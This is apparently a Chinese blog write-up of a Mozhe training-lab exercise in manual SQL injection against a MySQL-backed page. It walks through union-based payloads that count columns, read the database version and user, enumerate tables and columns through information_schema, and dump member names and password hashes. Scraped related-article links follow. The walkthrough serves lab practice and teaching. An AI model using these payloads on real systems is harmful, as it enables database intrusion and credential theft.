1. 测试注入点

http://124.70.64.48:40014/new_list.php?id=1sdaf

不显示,说明存在注入点

  1. order by

http://124.70.64.48:40014/new_list.php?id=1%20order%20by%205

报错猜解准备

http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,2,3,4

  1. 查询信息(联合注入)(注意 id=后面需要用个错误的值,如-1)(version(),user(),database(),@@version_compile_os)

http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,version(),database(),4

得到其信息分别为:

version() 5.7.22-0ubuntu0.16.04.1
database() mozhe_Discuz_StormGroup
user() root@localhost
@@version_compile_os Linux

  1. 查表得(StormGroup_member,notice)

http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

5.查列得(id,name,password,status)

http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(column_name)%20,3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

6.查具体信息得账号密码,密码需MD5解密,然后登录后得key

http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member

7.emmm,最后登录不上去

墨者 SQL手工注入漏洞测试(MySQL数据库)相关推荐

  1. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  2. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  3. 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...

  4. 墨者靶场:SQL手工注入漏洞测试(MySQL数据库)

    有一说一,本来是准备把笔记写在墨者的解题思路里的,结果不让写了,离谱 启动靶场后,会进入一个登录界面,界面下面有一个维修公告,打开公告. 1.判断有没有注入点: 219.153.49.228:4946 ...

  5. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  6. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  7. MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...

  8. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  9. SQL手工注入漏洞测试(Db2数据库)

    漏洞复现 用order by测试,发现可以,并测试到字段为4 用union select 1,2,3,4 发现失败 union select 1,2,3,4 from sysibm.systables ...

最新文章

  1. 前端开发中的性能那点事
  2. 2018-3-10论文(网络评论中非结构化信息表示与应用研究)-----综合评价的实例
  3. c语言判断2 1000素数,2是不是素数(C语言判断一个数为素数)
  4. 00后MIT美女学霸获2022年罗德奖学金!4位中国学霸入学牛津
  5. 穿着健美裤的美女,她们身材好是锻炼出来的
  6. 面试感悟—-一名3年工作经验的程序员应该具备的技能
  7. 实验1 熟悉实验环境
  8. cordova+vue 项目打包成Android(apk)应用
  9. 刘小乐教授 - 生物信息学云论坛第三场报告会
  10. java购物车后台_JavaWeb后台购物车类实现代码详解
  11. ubuntu wireshark找不到网卡及开启IP转发
  12. android relativelayout 垂直居中,RelativeLayout子控件垂直居中
  13. DOM控制video实现开始/暂停按钮思路方法
  14. 导出数据提示--secure-file-priv选项问题的解决方法
  15. 义冢oj P5033打气球
  16. React 面试题 回答
  17. html3d旋转效果相册,HTML5css3:3D旋转木马效果相册
  18. 血族第四季/全集The Strain迅雷下载
  19. eWebEditor的使用方法
  20. 央企招聘:正式编制!八险三金!各项福利!中国邮政招人啦!

热门文章

  1. 正版授权WiFi大师4.0.5 专业版流量主小程序源码部署教程
  2. 浅谈网站导航设计经验
  3. 小熊派gd32f303学习之旅(3)—串口打印第一个Hello world程序
  4. payoneer企业账号授权代表验证函怎么写
  5. Java 利用ffmpeg工具实现视频MP4转m3u8
  6. 医院PACS系统源码 PACS信息系统源码
  7. a href=javascript作用
  8. wp 主题,wp 主题大全,wp 主题模板
  9. mysql 手工配置_小姜学网络(MySQL数据库的手工安装与配置)附代码
  10. 虚拟化环境高可靠存储的构架和配置